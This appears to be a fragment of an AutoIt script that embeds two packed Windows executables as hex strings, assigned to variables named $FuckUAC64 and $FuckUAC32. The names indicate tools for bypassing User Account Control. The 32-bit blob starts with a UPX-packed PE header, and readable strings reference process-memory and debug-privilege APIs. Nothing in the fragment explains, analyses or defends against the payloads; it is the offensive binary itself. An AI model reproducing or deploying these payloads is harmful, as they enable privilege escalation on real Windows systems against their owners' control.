        $FuckUAC64 &= '871683735DBF7B872457306B3F2BF57A4560286F370D0A29613C256525AFF10264DB0139AF219D387198A3D3E7F10548BE95AF5F38D961A74E19DB5973BD87492E4B5F3266A39E9B0C0E3BB1700F0B261C78F075DD09314D0967CB8D336423029017F6846D9FB0080F500917F2429E9EF00AA01040F2429E90119DE0129013429E901730189CC0199E9017F2701A001B9B901CC813F242401E9AF81F0979425E302099C02179212FE497D078B079907A425EC80B70FC68FFF0F588F4484DFB411366C1AC188C8B56E3F53764D4FC872B002B52514C391026014C62A70AB7FB0CDD1B2E01073CEB5D6729BE59B0186D6F414F6B53F6BA310177053E36654513363649E5215F504D3AD6150B732100FF0B0FC98034031D04962403D20C8D088E322443328F9091433224439293B44421B99002B5CA8AE6C3CED3C00C7B7221EEAA200128240F804C204800101332804C84108132043220011004322003820220C0382C3B2001CB8E22996801019B304660000101018685402E023B6F54B6CADFFF0136219799141B140100818D2C112FEFB6912D1BF7110000FFFF7F40808182838485868788898A8B8C8D8E8F909192939495FFFFFFFF969798999A9B9C9D9E9FA0A1A2A3A4A5A6A7A8A9AAABACADAEAFB0B1B2B3B4B5FFFFFFFFB6B7B8B9BABBBCBDBEBFC0C1C2C3C4C5C6C7C8C9CACBCCCDCECF'
        $FuckUAC64 &= 'D0D1D2D3D4D5FFFFFFFFD6D7D8D9DADBDCDDDEDFE0E1E2E3E4E5E6E7E8E9EAEBECEDEEEFF0F1F2F3F4F54665C4FFF6F7F8F9FAFBFCFDFEFF0060440A21E00008A3CA06FF7FA1A4485580024058611F7F485F9D6828054D290FD3199BFD286E756C6C0A0206319FEDB725470307060210044500053530DFE23F433B30203850580772373030576FDEB5CB500720200B00086068600000787073AD749B7808071507001A018315C79E0E0047657B57FFFFF7FF696E646F7753746174696F6E17557365724F626A656374496E666F72B6F1B2B16D1857374C61C9411CCD92DDF869766550D675701713F4D9EF9E4E004D59616765426F78395500536DC447740352512E754CDDC60FCC0100068080869380F003A3D6B56F0786828014E9F1850008B66CED9BE180508088BDF3275723B5D6B5DF07F4505011F5281839EDB6B5CE08F66800E607F7707702745B3165EF43DF4E03551860A8428BF4A9D1DB66C46C27032E1131EABE65DFAB522F529B8249718A461F97155FF14D8B3774A965BC22F69C9D6D752719A7E88817C96F09617811C01527393B11A7DE8C55492B30B50597C536752D93052F7A2F2F5B9750CACE82AB056127D0A9D933FD6B007BDCB70C7A434B004EFFC25F08137D8552746C5175F7C28523FC79456C6576F0466CBE73000F2FEAB61005745151B325C4D8573545F3769BEC'
        $FuckUAC64 &= 'A4D8DC46110D676373B7707827D02561294F93E26C59DFD5578F0992D5574973C1BDDE2C38902F3965CF6D09FB770A9719258F9D126206BC432B9133412798D5C11B0B0660CF733D3F49E01D5E25C9E3F105430813211F447A45649B73C14DF9249BB2A71D2E5F501BE6C63657F30D495B550B27E2F156C220593F277C8F09133D5BDB59540D8704635B6EB14F874605F612644F375148DD00D94E4F55354B7F859012DE573F2F11020987D37755E373B8A438C87F45392F74DBB0678B830F43289929EB1E0FD132FF31CD3768714618EBDE250F424D72BF3C346407E6071D400F2EDE48DD49B73E59416720BD2C32C4218D690BDEE9E911AFC964A31BB091AEEB0170FB2F01772E5990A612860A2F6635AC430A6B20D58761358B96B59B9B0B494B9881E529058DB045C6EF8F848D6C658589B1CC5C306C6F27850D81F73AD7BD7983FFFF6B0255BF534453396C90A8DB44D949BEBE3A37F8DFFD69527E3AE70717443A5C56697375616C20E17564C0C1852E2032C9305CFABF35F8FFDF735C55414320427970D10A7836345C52F0806DAD65FE0B65162E7064126F00AC8A000103A7ED0D7E83C732023001147514640C03FF5F2ACA540B1014721070111903001942157036DB93DB14302F3C2D2317035F309CDE6E1BCD438A04F7340903520670F736DBC323481803E7579C07639AE6E44B0C'
        $FuckUAC64 &= '0C011100080706E5F6765932192F3B1E74B50364B4CB6D89CB34B301B04E505F4052702F59469605110732261DE56CD66C037D7583C372FBBFD9EA191F083734720CD00AC00870076006504772BB6CEE3823CB0AC40B03740A7BD8CBE5640934085215D0538C21276141B8AC225311171FB121CBE5F7250D26909734CB6E92060223BE26C8AB0ED97683DD0B042733CB132E27BBD9CB1313320F3364289128F292CB4BA328DA280112CBE5FFF612340D03920B50192E09001D64C434C301096610FEBE000EC00C700B2BE05FEDB234CD0A0908520104BD97DB0BDD04621B20DB206411035410340E78DBFE2F721CF01AE018D016C0142310C71074072C6F7C673B07320CC001091309320518B54DD32CAF18181818322BFC344DB3130A0A0908D012C0BE6D2F34C7305B1F34A60301B810F00EE0A579C21281CBD0040FE576929B0F0F320BB63EEF673F76642CC8EC9D2306111C676CF6BBF61C640F03AF1C7218F016E06B3B07592E3CD7412BE542E6192DBD5C6E6F831B6451035450344F014A00E6C33D9B31834002370774BD6D499A6454F3150B15D4058FE572B903740464033402E0BBDE9E6D9706340C0352CD011C3B1C74187785D2DC97541716A02713D011932263B8C02B13085FC135AA7E930D4539977BE1C2FF72173413430E920AF008E00610C0021B6CCEC50648F7F323FB10A6'
        $FuckUAC64 &= '59BAB2D23735100F263992970E330E72300FD36D65690EB2C708C30856B62D4D07063299111308CD7632F74B5903890A7FA639E17B0A02BF302709084C56599A070632370EF266CEBE0E320A307F09F70F520BEF6D224B07073B07019B0F5ED6C7640309A7426777694276B6D903AA309D071167EB6C9BC327CE426ABF52CF3434632F5011BF0C0BE30A730FE9F0F0A5778A6B3B0390A61BAC6D37510FE79DD266E176192167125457121272691B6F933060731B4F1BC40F6B7427BC34970E640D0C9214500B076E8F2C19BFD371720B7572E576FB4D071117471764431734667BD9FF175213F011E00FD00DC0DB0974039798B05EB0B893D3BF32CBE521CC790BB6757C76D6CB70B0217F191E333F86D1FA7FE009D007C0057004600350D777695987C92712FBD3ABBDE4F200537E5D7E1936F300F92FF32534710325016603201B073B1B0E7B730BDD0A60609BED614F4986037B1F9EDF611B5A817403AB11322786C0667B1B87035F069E13F864691E9B0A0832011708E9D25C684B094F54080732130BD2F497AE067B10B20E700D600CBB09DDFF46C7A207E0FF0FC00D700C600B300AAB117869160CCFC70C0B3217F02EBF094C55A3A7609492942CB9BC4AC796EB965E242C0B47016203C198923196DC5BF5984354A4699AC1B7877464D86C0F9BE03F9A9A03BB389E7BAB6140CB829B1F'
        $FuckUAC64 &= 'CB0D349103201DAC76018E8FFF60041F5F1AD8CA521F06EF16F209C00798B93DFB700660909B4F63112B3F134FD29C192AD34B5250C8B63B2C2B9C273C142B805519542282328182485802470544069A0107098220D2CD5D80CC45F020D266D4940064640A3910002001241523A866292C627CFF199042221CD7A8CA480103024842C612905F7E7FD02001020408DEA40360827982211E297A76A6DF07A1A532819FE090DE7C7F407E80FC2FA8C1A3DAA3E0D820678F81FE0740B52F7F37C81041B65FCFA2E4A21A00E577EC15F2A2E8A25B7EA109510503FD95FC76DA5EDA5F5FDA6ADA32D3D8DEE0F9D61131B939317E8E43251964B0539698079490649041068C888490410619807870833C1B6468585F96483C0C32C820302C2832C8208324201CC820830C18141020830C320C080479F2E4C90095F895E895DC19EC853C95D495CC07C464904106BCB0A890410619988880410619647C7058764A30D54809D7679540B7419E3C799538953095280619649020181000C993274F94F094E094C83C79F2E494B094A09488948093274F9E94789470946806F9CEC99460945F50481964904140383064904106281800D80B79F293F093E093D00720830C32C0B098830C32C88870584C0C32C8204430084E44069F92F00168D5540EC188C01FB379819CCAEFE180A41093419E3CA8A0AA20603B'
        $FuckUAC64 &= '8B45C1D820EE63160369061BA40203070418A6699AA6050D0609076C90419A0C08090A1BDF7B01190B573B070F48F7BD60579813110312196C902F1721350F416CB041064350335217B0C1061B5307575F597B9AA61B6C6C176DAB20701CB0EF056972C72F80B341061B6C8107821F83419A66B0848F91299E06196C90A1A46FA7B70761B0C19FCE1FD70B1807C9594B3833FFA68A4672B20FF760DE2AE3401510C9730B7883903B2F4A071B0022FF00800A4752A29000DB01A3B050642F3F0EC051615F01781704C873012E641B49172F2E07700B7654F2F4747F00172CC80E39E178074A987D58B7A61201B7D7BC08E459077C84AB30A30A2182E7644886B201000203C8208715D702FE428800295616641405041161292803D936CB5410BBCCCA0BC05C76CDB26913EC7007701418CB6C965DB3809F0BF0C2A0411535CB65B3F444154616FC485C7666D707CE03D0C8077B1710C3E5F26CB37C91171794170B192E4F2E9B340C191E1920196A1A93CBAE59586C07F81A60C3EBDC93CBE81C74C3A21D430BA4073AF7E4B2341EB8C3A920BB0BACC965B3ED078A225FDC8C22B422DB35CBEDE4230B5D25406007B725BF365BB73BB8072D268BC4073C61265DB3EDCE2F64071927172C1C07A07EB327972700C9C4273B07F728BBB39DE9A7C4077929177C07512AECDCAE73A7175C07A72B375F'
        $FuckUAC64 &= 'A82B3AB73BB9D92BDC074B2CB3174CCDBEA6EB076A0BD4B4072C2377F60BF607F40B073A2D5F3C0737DB756E392F432F4407243017076EB0EEEC4B302F4C07AF17B00B75E67690E15031AF21323B24CE766ED7075B0308C5A7079332239433BBA6E917E510E82B82330BBA67DDAE8407783E7FC5077C3FFBC5827467CF07BD3F77C00BD80CD69DFD0711405314072A0B445DD30CD28788BB8447BC27BB137607F54067F80BA741A8D9AED976073743239070079643CB6CD7B9E6C4434673172407674677DB6FC6EE680738483F076D493BE4EEE4B23B07084BFCC5F803DCEEECD914C6077D4C2F8007524F4FB06FB6EB1754078C4F8307C40BECBAB35F071A506B1C07CF0B40C6ED9A65B3F0DA5150DC073F52B73BDB9DA740075D522F60072A555B9BA6EB3A232C07C20B7CC4225734CDB273670B2457A2B4A477F6ACDB28581FC607AF58A7C8079BED9A6DAE5917D8B007F4599B07E99AE5F2315A04C734B20B0C90E5C9A6B4375B385BBDB967DD66D0045F5BC707F26297B3DF6CD70BF407606347076A6417D9A6E9BA6C07C90B34CC326523AE6BB6DD500700660B481007B803BB66D9BD505F0B976758B0076568F7BAAE734F0B8007A4036817079AA67B5DC803702F0BD174E035DBA669E178706903B17CB43BDBEECB075E6A9B9C07D96AFB4DD89DD7DC07286B7307146CA3BA13769D23'
        $FuckUAC64 &= '20077F6C7F800BA6EE2C9B41A8A76E0C073AB70BC6DE6E7B076D704317784E7667ED07BD7067C00B0771085ED79DED075A72775C077F03505F709BA6E90B9DD0D00275BBD20569F727074F75830B93CB66DB0C949E763BA0A076B74F2EBB9376B807C078D8C845792CCF76672F4807177A0B347A9FFBCD3683A0E07A3B07967B9B2EBBAE3BB007FE03F8E3007C9A7CDB9DED4E9C076F7D2390070A7E17364BB33B0C07727EC974D485AED99E5C30C9B3860B54B40766DB9DDC8B87EB17071B890BA8B76B96CB1C89A98ABCAC07708C8FB73BEB59C907848CDF9007B393A3769DDB3D4707CF949B0BD007239505815DB0C70764958737DB0CD20B9DA05C96A707CE36CBE51F9728CA2057973B58679BA6EB07B11750B449982F4C745DE776072F991F173007DA0B8475DF6CD3DC509A5F07F50394DB74CDF6539B035BC40B5C7E9B23D79DB43B9007249C3B3007570B3483344DC457757590FB82348390AB07C60B6C066906CBE6E60A9DA419EC9B07280B3052A419A419526D6D95A419A4199DB8B8D6B219A419D6ECEC069E605FB06F071F0B07381736CD20CD3853607BE4CA2140A459809085088151116005490A0200481804842B82E53960900118E0DBF67F4D6F64756C6548616E640557114F70656E41BECD8A7B0C52656164FD8AE0FD4D656D6F7279316245723EF62FB616720D1F4164'
        $FuckUAC64 &= '647230566972746D770508CE137465632478B9D61EAC113E3332461A3660DF932D9B6F0F204E65780F43FDEDBF6D49613C546F6F6C68656C7016536E61707368601FB6AC4F39286C6F73B7FB95B5B70C57726934AA436F6D6D214BB6FDBB4C696EDB5465726D09612822F6645B3B75CAF27412556E6853A708B63664BD10706C5758E9DA696C32EC531C490667D8FE734465627567670B500A503DB1720BC2746C0F367769117BEDFBB74CD86B757046756E633D4527A917D75A6BAD43E52939B011DE988182339950E20AB6BDC7DA410B074F454D096C56546F73B7ED69642C64CA6167FE47630BB6738FB56F658C466C732C2375650CA16B07325346650853C76E3808230754687F644964426E0BC72A416C63635D4465F03DCC5CADD0DF451343BFC55ADB7D69636154D5154C65617665402A22255378AC6142B13D657D537464E12F1943CA931C4E616DB9B656D8DEB369764D460F6E0416FBE62D3C6E6773572C17705898B9DE4F23758B76640DAE498B337A954124F6F766ED537034264E75547970963B3C341C61C0708757071AB865CA5AB3EC48706F616C49148F3B5617419B916C731FD50B0AB1F640C650032AB4CCB613CE9E658154556B870ADF616597908F79B2F0DEAD35DD28EC4173A809586A5BC34A0A4868A9344D08EEEF56367F4279694C434D96101BD692B9BA18232DE0'
        $FuckUAC64 &= '18B3EF0520EF57A81D36ED1A2D5ADE436F613B6272BD6004DB2C791E110A0D9F346B1C0C676E736F6C50348661600DC5717537CBF0AFBEAB4275666612551005C3108439930DC978138237BE2172F626248C53214C202A90FFF2B100F06C920818084008F0300D109602F90FF0E832F01001084B63CD29B00070204030F099E4B2DD80016A5806321020BFABA80100756486060041965B05B9D9DD4EC2C42A0BE99E35DB020A0C9058130C190B1075044D1E4001001D056E5D5BF6040007501D04077D3E1B366C5B032A8134060FCB6D602B0A0844CB28B2DBB73D303FB468200428081F902576DF7D6C17C0A2C11CBAC2BA83A09A021E2ED81764F7EC90908EFB04234171815ADF602EE94E576A7D8A5333273407EB2EA49440022E2678374F49D37427E014C8C02E706936F76628E3EB4F0ADC4AD14600AF720B0069BA1313302702E67D87F7E9650A00D21FA9C3E8C885DF9427421BC0CDCDD044000000F88145010000240000FF00000000000000000000000000000053565755488D350599FFFF488DBE0010FFFF5731DB31C94883CDFFE85000000001DB7402F3C38B1E4883EEFC11DB8A16F3C3488D042F83F9058A1076214883FDFC771B83E9048B104883C00483E9048917488D7F0473EF83C1048A10741048FFC0881783E9018A10488D7F0175F0F3C3FC415BEB0848FFC6881748FF'
        $FuckUAC64 &= 'C78A1601DB750A8B1E4883EEFC11DB8A1672E68D410141FFD311C001DB750A8B1E4883EEFC11DB8A1673EB83E8037217C1E0080FB6D209D048FFC683F0FF0F843A0000004863E88D410141FFD311C941FFD311C9751889C183C00241FFD311C901DB75088B1E4883EEFC11DB73ED4881FD00F3FFFF11C1E83AFFFFFFEB835E4889F7B900900000B2074889FBEB2C8A074883C7013C80720A3C8F7706807FFE0F74062CE83C0177233817751F8B072500FFFFFF0FC829F801D8AB4883E9048A074883C70148FFC975D9EB0548FFC975BE4883EC28488DBE004001008B0709C0744A8B5F04488D8C30B86101004801F34883C708FF96E061010048958A0748FFC708C074D74889F94889FAFFC8F2AE4889E9FF96E86101004809C074094889034883C308EBD6FFA6086201004883C4284883C704488D5EFC31C08A0748FFC709C074233CEF77114801C3488B03480FC84801F0488903EBE0240FC1E010668B074883C702EBE1488BAEF0610100488DBE00F0FFFFBB00100000504989E141B8040000004889DA4889F94883EC20FFD5488D871702000080207F8060287F4C8D4C24204D8B014889DA4889F9FFD54883C4285D5F5E5B488D4424806A004839C475F94883EC80E9D7AFFEFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
        $FuckUAC64 &= '000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010001000000300000800000000000000000040000000000010009040000480000005C7001005A010000E404000000000000583001003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C7472757374496E666F20786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E7633223E0D0A202020203C73656375726974793E0D0A2020202020203C72657175657374656450726976696C656765733E0D0A20202020202020203C726571756573746564457865637574696F6E4C6576656C206C6576656C3D226173496E766F6B6572222075694163636573733D2266616C7365223E3C2F7265'
        $FuckUAC64 &= '71756573746564457865637574696F6E4C6576656C3E0D0A2020202020203C2F72657175657374656450726976696C656765733E0D0A202020203C2F73656375726974793E0D0A20203C2F7472757374496E666F3E0D0A3C2F617373656D626C793E504100000000000000000000000018720100E07101000000000000000000000000000000000000000000247201000000000032720100000000004272010000000000527201000000000060720100000000006E7201000000000000000000000000004B45524E454C33322E444C4C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C467265650000004578697450726F6365737300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
        $FuckUAC64 &= '00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
   
        Local $FuckUAC32 = '0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000D80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000A9226204ED430C57ED430C57ED430C57F6DEA757F0430C57F6DE9257E3430C57F6DEA657B3430C57E43B9F57EE430C57ED430D57BE430C57F6DEA357EC430C57F6DE9157EC430C5752696368ED430C570000000000000000504500004C0103004596DD4E0000000000000000E00002010B010A00006000000010000000C000006029010000D000000030010000004000001000000002000005000100000000000500010000000000004001000010000000000000030040810000100000100000000010000010000000000000100000000000000000000000B8310100AC00000000300100B801000000000000000000000000000000000000643201001000000000000000000000000000000000000000000000000000000000000000000000001C2B01004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000C00000001000000000000000040000000000000000000000000000'
        $FuckUAC32 &= '800000E055505831000000000060000000D00000005C000000040000000000000000000000000000400000E02E7273726300000000100000003001000004000000600000000000000000000000000000400000C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E393100555058210D090208'
        $FuckUAC32 &= '9043D8BCC72586DD6B0A01005159000000CC000026050010FEFFDBFF558BEC81EC30020000A102B00433C58945FC535633DB536A02FF15FFFFFFDF1180248BF083FEFF75125E33C05B8B4DFC33CDE8050004A28BE55DC38D1F7363FF85D0FDFFFF5056C7072C41301885C074DEBA7FF73A578B3D0A208D6424008D8DF41E680E99BC51DBBFBBEF3B063B83C40822108D95365256FFD70D75BB1BDBFDDAEB068B9DD80F5F56442C6A5E8BC36DDD059B6C5B6ECC00AF83E4F8EDEE0FB9B23404C4898424300D8B4508B9EF3BB0F657506A08BDBA247BD87A3BB6BD95C62DC05F5EC88C3033CCCC83BDB92F442410CA05182804C81CB26B8F352EC7288D4C2FC19A94FEC1DA070E8D5433BFDEEB048B5C242C58D76CC3BC5E3C5FC15B63EE76270BBF6AFE4CA328042AC0641E1EFBE6C3005083EC50CC3145F882E463DFBFFFC88D45F064A31D8BF98BDA7EA8D600EBCEBE2F85F6741D10BC701081290FBE5B21D9E53E3A890D3B59B703B2E0EEB7E42BC64074DE2DFC16FB576A006A383D2CF8897DA0852816E383EC8E0E0C50499B7008EBB4C710ED17B65F4803F38FAC5C348D4DB0519CF9B72F6377080F84710109837DAC340F8567F637DBBFB8F002FE7F3945BD0D4B817DC1027406C70C7E64D9CC3E15CC35D0047403837264195928D81FDC08BEFD7F33128A45C63C017513807DD502750D'
        $FuckUAC32 &= '05E10475076C77B7EF959C40EB1F847285D28E3845D508C9103EB38CE1C0209000DB5A7BFB0FB65506F201880509298395F6EFFE6E882FB64DE183F1048805C6168D55AC526A1CD2869B8DC2C6F5AC1D30FFD3D43B9BDBBA0ACA1CD4B04FF7A8EFAC1BAC7DA4516A402AF31424313C74ED8C0D360DA33201B7B6EC838B55A452341E4B755E350C4376A19D20569C61DFEDAE000E03D9E90401D1BFE01D017B40489BF0EB0C0D15A664B0B032088BD51932669C7E2C7A7F48C6324E0B3B827CFD05E45BB45813E8C7FB3E64F7A36886750F1E9E48EB2556C998C3EC0A00AC921BD0DDCB763F098BD08BCE0D016CA904A1239F19A5DD903407077AA1BD77FFEE08B3C33B0D9A7502F3C3DA09138B5DF737B9FFC6EF568BF1C6460C006C633B15BF8DB7FFE68946088B486C890E0468894ED80E36B7787557F8EE74128B07B530854870A32713BD892EDBDEBD6E46043BAAB43874160A081F08A171B7EC470C3C0415F640707EBBBFDD775B15026401EB0A8B085940041CC65EA50BB1D25DC2E2863A10533CBDF4D75ACFB4D0B18B5D16DB7526E5DF0EDF0B1B26C700162DB11AD4385DFC74077463D7FDF8836070FDB8FC7FC706387A7D0C2B3446D679272DF2672EFE6FB52B3710D178140056753C2BDF0FB78DF6B7DFC083F841720D045A770883C0201018C8F36D8502940607160B06DB4B77FD'
        $FuckUAC32 &= 'C083C70266323A663BF8C8EB33110363CEED76AC51506918AA35310F83CFB985D8C302128810313734EE7BDB9E05CD0CC802C62BC1975E9881095F964D615F5BC9C30225594761B7C22497698B401517CFFDE61A1BC2EB88EDC974E22BF1B23443D2BC0ED0D0018CFC3553C1D287D074C8C242A9D0BAEB10BE3606AEB8BC713B0538B10C5E246A0C68A030D9BFBDEC442A5C33F6391D0F95C03BC675158EDBFADF1F83C8FFEB5F146F6A205B03C3D50116B87391BF1C8759598975FC13071D245965AF2C151BE50C6817ED1D66E01E8AA10F5728A5D8635FC6C418D5075A8B1F2AA1C325372B83B9C862F51246ED49F8F12C4B59CD076D43BEC802E8EDD9CF7619324F7030A068FFB32DBA39B76DF274E11450DF350CDD886F3F83F6750B56565C0838B84D5A06663905BBFBD66E86F00049CDE4EB36A10B3C81B8117BF3FCF650452375EAB90B01881875DC831917BABFC1CB76D333C939B00AE832C189FD5A4DBF4DBD399B5608C3D07F59092719D910172F10394F2F8EFD96ED370A18791BB15C598934A3B167B7EB9B841036B209BEC404254C467693081033D209B38DC223202E3B59AF5F5012B1DDBB5D8EC24C3EC25050FFEBC240056E17CC8638F203EC84E039E175066A15FEC62D12043EEB2E7917DD6C785BCE09C2DC50517132888B65E80C7601B716DC2E86E4002F28491682F04D'
        $FuckUAC32 &= 'B3AEE0CA86CEC339B993A8182803B97973ED81BFD88F05D48915D0891DEDBBB9B9CC8935C8893DC4668C18F00634DB579A0DE420C01405BC3B374BB325B82DB49C8F8F6D3CDB9856DC0704E065084CBCEDED07BB85E0FC8FC7231DD6DFC3DB01A11C41DC13BED009743E0BC3D8C009D4C4FF8985D84630CBE7320A08DC804C2C0A47F84E20543A545CD2F618FBC0F2817C0A446F2063EFB0850E0823685B1B40E2DDA5B150063CDD2DA4FF742283E8974A7C5BB017040D740C48A25AC3B8673B9B8B04DE05120B08BB9B289C11344CF068019B33FF4DA6D7E28D461CC35A8CB78BFD5FB61B567E0402080CC1E1100BC18D7E10ABBF3B43B700B9B610CB2C2BCEBF388A1463BBFF12B510404F75F78D861D0EBE001308E8D5A0344E0E70B9D184FCB11C05578DE8FAF0E21DBBFF7604BB50BF379FF77F787BB080888405E9403BC772F48A85EE2AE17E8B6FC68510204F74308D9DEF10175ABF6D1EC802033BC877165F018D94B88B6DBD0D1F1F52C2A28A4301B36DB819212F75D64D760C70FCA7A6E73A6F507B2AE26AAAB674CED43E0A3D1715FD571EB065D74D5734534C3CDD44209D2A0C64FC9C43A5BF0F972424378C4566F6C101A3B75FE30BD3061D108A5456EB11120274FE70779E152048888C0630EB07889CA526FCC508EBBFEB5246A43BB6E4BAE4469FB0E7290B8B9505CBF6FFFB'
        $FuckUAC32 &= '8D840E1E03D08D5A2083FB19770A640E8D96675BE05120EB9AFA0E0C20E06AEAB7177EEB03C627413BCF72C69B5F9141E09099C97570915820128332A14C836FBCD14770A4837F6C3E178B7768145462D2866820D63C7285EF9E6C6A0D073FC4598365A322D5C148ECAD3B359136771A5B8F5F9CD1584781FE2516568B7D7B7D2FF716248947688B2D36F697C0992A54800CD7EB8E8B1748B85AB1601300A79F86846199A7C4C1F4D8F9F45620FE751E50C1F448EA60F0C460AB45E3EB3C6C0F59D9FEFD225CEBDB16FC2F7361A290101CEBC424D10612E7E820E21601E3EC20AC220C56AA40E16B2857A9E02EC9F8D5A25D7F083B875B7F0A48BA9BDB55F6810F36D80939B8E3403768F036C591795449303DDCD6B6BBF00A72E781E7FD07187476D28619D90BE96831C7BD8E2DF77164FC56115AE87B7424F37C125037A18D43F4C0416A9E9FD2424E7B12A70DBE9E730C3955018633EAD9FE47DDEE52D3CE75EF8A0E84C90CC6B25DD392224629C9A10EE04656BB731566466BC930B9CF6BFA07DDB1B750802B8A46016429347D77C36D3E02C0EB32E08A801C3C08443B1D7AA9C2DF4D01473BF876EA8B019402803EDEDA66D88FD0B8E9E00D107DE0041F0E77EF4172E98BC79BC743086121196AFCBB8DF60689430C78A78948445A668B31668930DDF7175C281E024A75F18BF324ACA20D'
        $FuckUAC32 &= 'F67BE98D8EBF031D0409C176F65E7EFFBFFFDF9BE38530233B1EB9FEE40808404975F98B43042D34EE625755895308E90708C4E7AC60B3AA7BEBA75C945BE170E74154FE42E419909E075E081490A385207D834DE0FF0CDBDC523422181E8B5F68F3F2034CCF422BEE718A5720F4D91A2D9B174031D838144616FF26B7B9889B128BFBF3A5832300530D6570B0740D3A59C4C4A4AD12AF2F1FBC2C6825C949379A11B0683D2750F41FB0D5897053BF54FFD7F646DBD3666BC436EAF6059D010CDD275A423282926B856779B6040708080C0C09A1B0F08E8978F8057D10674C73693FC6DE700C4506F840EBE8193D047D0DCEC9B6FB8A4C181C88B6B23018E90074F9BDBAB018611BB338E6FF6491268BB5B613CDB8FD92B6371D13F5D7D110A6EB30175AAB24CE668E122081034293B3FB3553E4EB3F4812B704D0E000D5EACD6C9D4F372F126AFD0F4559B0CD6CF06A35A9A9A0FC4D0E78C9B12957882CD68B87010EE4BB00D803500CB8B4DDBEE440C08D5F50AF0806B0AD36DC10817BF8633474F1031B0F333475837BCF0A610FC310957B4DF7FF4D087540D40552158D566FD6EC5D8E86170C146583B983189A58965F835D8082C75F9853B88BDA1BFEC386BC3ADB573BC3746F5BBCE874681364DB68F79A105E39555A0DB88EF784E61713D6FFB635C76520D9CA44F020B487795ED86B0C'
        $FuckUAC32 &= '4F383FF7C03BBBAD3944400DC4A82DFE20619BCD1610CCBF802BC712D5906ED9D00D4CC0DEA07BCDE71BE8C2B5751B3998B1647BF6938D411075D44B934968AC447F6E07800FC374840BB5395FFC18E190DD6847041683C753C72E134230BCE30C743BFF424303C67E3458303BF774285789F0D7C48F38EEFD59031B33118C83F0E4492C155904B6A01225416223BE07C75EEB02CC5D8079391990B0F04622837E4C20F1AC1C16706C850CDF029F969BB778296C6413C9BFA4AF706EE483142AEBBE6A0CD8C1A881A4C35468C3068C8D3DC16C0F56428011709591DF17211B11C21478DA2DC181207446C3ABB77CDF4FC66ECF741650291CFFD0830D19FF7B67F07C1F800ED77C1740225FABAEE987944DFBD0B92372292184D4A3C7465C6DA38E7E8FB88366088A477414026DE6D6F070C686C8C143064B012168383010783F024F81211CB24A155B20C806B84161FCAA1F466C05D884CD7D95780B316CAE312CE7260C64587687B444A48690392443831122BF0A7C225BE5E011DA48F02E4E6814106B02D3239340768B29B856293A868C301F183418AD67FA1682563CB92F152F8B607CA34EFE8906EB096C59FBDCE15969805F69789E6D6727BC49C707101946F8C1D60922C179F8641B86FB61462464C80D2C26644226343C404226644244486190EC705C3DA61090806C543A7E681F0857'
        $FuckUAC32 &= '4B989CC0FFF157A5E90C6EC8171A13DC3B6CF7118FB4235740593B3D06143FE458E9A6430C833FE64412252342100E2636BFCE97F002C2BE0BC157C3421C186CF8C10986D89D40D37C8FC3AD10208510C79EF819B207045748100C84F80323272314F01879237F635F3D21003B74131C741614A628634BBE0D0818541E7CB1D324A15942097CCA2916E3E6387C43891D3B90320B413AA339CCC1028F0C4C86CE045BD6C6C60E2DE4151076681A23059B116CAC6DAC1E62C1269AAC630B4AD96E2C1ACA636278CD16044D1CD24689B79CA3D544C6850C60CF30D7CB168505321B5233C1040EC2075C5E5F3928F00D6AB273EC1466393AA946449623870DD937F89162EC8175EC8B4E149E3BCB71ABDFC075155C8D48BF6683F9CB0466DFDBE01850EB4B9B01923E7366A83DA11E5B461D98F110B77A8CFE59742C8B8ECCE80401EBFA55FCC42FB8B552290508524E45EEA9AE302BE8288D05FCEE05699A62F80EF45E164CE0C1742220E845BC45426AFF6383FBFF4CF0095EB97983A5F4265570DF914C8D85E408084FB94582D70D16DE0B30FDB99DE054A5E205E0FD9FCFE7B38DDC95D89DD4B5D0BDCCE4C8B137668C95F8068DEC9DC8DE1C397285C4A5C0ADBC9C8F85F04A155A608B42717341ECA1AFC76F816A5C7EDB6FE81B49FC18E4084D0CE0FCC38231F710118BEC74888D05A66A0D69'
